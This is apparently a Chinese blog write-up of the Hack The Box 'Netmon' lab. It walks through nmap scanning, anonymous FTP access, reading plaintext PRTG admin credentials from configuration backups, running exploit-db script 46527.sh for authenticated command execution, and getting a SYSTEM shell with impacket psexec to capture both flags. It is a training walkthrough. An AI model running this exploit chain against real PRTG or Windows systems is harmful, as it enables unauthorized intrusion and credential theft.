Please enable Javascript to view the contents

Netmon 练习记录

 ·  ☕ 3 分钟  ·  ✍️ IceKam · 👀... 阅读

环境介绍:

名称:Netmon

系统:Windows

信息搜集

获取目标

1
$ nmap -A 10.10.10.93

Netmon nmap

Netmon nmap

  • 系统为Windows Server 2008 R2 - 2012,端口2180开放,部署有PRTG服务。

shell获取

ftp匿名登录

Netmon nmap

  • 登录成功。

flag user

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
ftp> cd Users
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-25-19  10:44PM       <DIR>          Administrator
11-04-19  03:25AM       <DIR>          Public
226 Transfer complete.
ftp> cd Public
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-03-19  07:05AM       <DIR>          Documents
07-16-16  08:18AM       <DIR>          Downloads
07-16-16  08:18AM       <DIR>          Music
07-16-16  08:18AM       <DIR>          Pictures
11-04-19  03:28AM                   88 tester.txt
02-02-19  11:35PM                   33 user.txt
07-16-16  08:18AM       <DIR>          Videos
226 Transfer complete.
ftp> get user.txt
local: user.txt remote: user.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
WARNING! 1 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
33 bytes received in 0.32 secs (0.0994 kB/s)

$ cat user.txt                   
dd58ce67b49e15105×××

  • 获得user的flag。

PRTG目录枚举

Netmon pass

  • 搜了下PRTG具有配置文件明文存储漏洞,找到了PRTG的配置文件目录。

PRTG密码枚举

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
$ ftp 10.10.10.152
Connected to 10.10.10.152.
220 Microsoft FTP Service
Name (10.10.10.152:root): Anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls -la
200 PORT command successful.
125 Data connection already open; Transfer starting.
11-20-16  09:46PM       <DIR>          $RECYCLE.BIN
02-02-19  11:18PM                 1024 .rnd
11-20-16  08:59PM               389408 bootmgr
07-16-16  08:10AM                    1 BOOTNXT
02-03-19  07:05AM       <DIR>          Documents and Settings
02-25-19  09:15PM       <DIR>          inetpub
11-04-19  12:47AM            738197504 pagefile.sys
07-16-16  08:18AM       <DIR>          PerfLogs
02-25-19  09:56PM       <DIR>          Program Files
02-02-19  11:28PM       <DIR>          Program Files (x86)
02-25-19  09:56PM       <DIR>          ProgramData
02-03-19  07:05AM       <DIR>          Recovery
02-03-19  07:04AM       <DIR>          System Volume Information
02-03-19  07:08AM       <DIR>          Users
02-25-19  10:49PM       <DIR>          Windows
226 Transfer complete.
ftp> cd ProgramData
250 CWD command successful.

ftp> ls -la
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-03-19  07:05AM       <DIR>          Application Data
02-03-19  07:05AM       <DIR>          Desktop
02-03-19  07:05AM       <DIR>          Documents
02-02-19  11:15PM       <DIR>          Licenses
11-20-16  09:36PM       <DIR>          Microsoft
02-02-19  11:18PM       <DIR>          Paessler
02-03-19  07:05AM       <DIR>          regid.1991-06.com.microsoft
07-16-16  08:18AM       <DIR>          SoftwareDistribution
02-03-19  07:05AM       <DIR>          Start Menu
02-02-19  11:15PM       <DIR>          TEMP
02-03-19  07:05AM       <DIR>          Templates
11-20-16  09:19PM       <DIR>          USOPrivate
11-20-16  09:19PM       <DIR>          USOShared
02-25-19  09:56PM       <DIR>          VMware
226 Transfer complete.
ftp> cd "Application Data/Paessler/PRTG Network Monitor"
250 CWD command successful.
ftp> ls -la
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-02-19  11:40PM       <DIR>          Configuration Auto-Backups
11-04-19  12:49AM       <DIR>          Log Database
02-02-19  11:18PM       <DIR>          Logs (Debug)
02-02-19  11:18PM       <DIR>          Logs (Sensors)
02-02-19  11:18PM       <DIR>          Logs (System)
11-04-19  12:49AM       <DIR>          Logs (Web Server)
11-04-19  12:54AM       <DIR>          Monitoring Database
02-25-19  09:54PM              1189697 PRTG Configuration.dat
02-25-19  09:54PM              1189697 PRTG Configuration.old
07-14-18  02:13AM              1153755 PRTG Configuration.old.bak
11-04-19  02:54AM              1722421 PRTG Graph Data Cache.dat
02-25-19  10:00PM       <DIR>          Report PDFs
02-02-19  11:18PM       <DIR>          System Information Database
02-02-19  11:40PM       <DIR>          Ticket Database
02-02-19  11:18PM       <DIR>          ToDo Database
226 Transfer complete.
ftp> get Configuration.old.bak
local: Configuration.old.bak remote: Configuration.old.bak
200 PORT command successful.
550 The system cannot find the file specified. 

Netmon admin

  • ftp登录后直接下载配置文件读取到帐号:prtgadmin密码:PrTg@dmin2018

登录成功

Netmon welcome

  • 第一次登录失败尝试密码:PrTg@dmin2019成功,同时获取到当前的版本信息:18.1.37.13946

版本信息v2

Netmon ver

  • 也可以源码审计版本信息。

漏洞枚举

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
$ searchsploit PRTG    
--------------------------------------- ----------------------------------------
 Exploit Title                         |  Path
                                       | (/usr/share/exploitdb/)
--------------------------------------- ----------------------------------------
PRTG Network Monitor 18.2.38 - (Authen | exploits/windows/webapps/46527.sh
PRTG Network Monitor < 18.1.39.1648 -  | exploits/windows_x86/dos/44500.py
PRTG Traffic Grapher 6.2.1 - 'url' Cro | exploits/java/webapps/34108.txt

$ cp /usr/share/exploitdb/exploits/windows/webapps/46527.sh .                  

$ sed -i -e 's/\r$//' 46527.sh 
  • 直接搜索漏洞利用,注意这里字符需要转义,不然无法使用。

获得权限

1
$ bash 46527.sh -u http://10.10.10.152 -c "GA1.4.145397969.1572851737; _gid=GA1.4.145397969.1572851737; OCTOPUS1813713946=e0U4N0JFRUNFLUQzRkMtNEYwRi1BQjQ2LTRCNDU3NjkzOTA4Q30%3D; _gat=1" 

Netmon ok

  • 获得一个最高权限的账户和密码

flag

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
$ /opt/impacket/examples/psexec.py pentest@10.10.10.152
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

Password:
[*] Requesting shares on 10.10.10.152.....
[*] Found writable share ADMIN$
[*] Uploading file hOFlpyyw.exe
[*] Opening SVCManager on 10.10.10.152.....
[*] Creating service jPEV on 10.10.10.152.....
[*] Starting service jPEV.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

c:\>cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop>dir       
 Volume in drive C has no label.
 Volume Serial Number is 684B-9CE8

 Directory of C:\Users\Administrator\Desktop

02/02/2019  11:35 PM    <DIR>          .
02/02/2019  11:35 PM    <DIR>          ..
02/02/2019  11:35 PM                33 root.txt
               1 File(s)             33 bytes
               2 Dir(s)  12,058,017,792 bytes free

C:\Users\Administrator\Desktop>type root.txt
3018977fb944bf1878f7××××××

心得

不错的,impacket很好用。

分享
您的鼓励是我最大的动力
bitcoin QR Code

icekam
作者
IceKam
从来如此,便对么?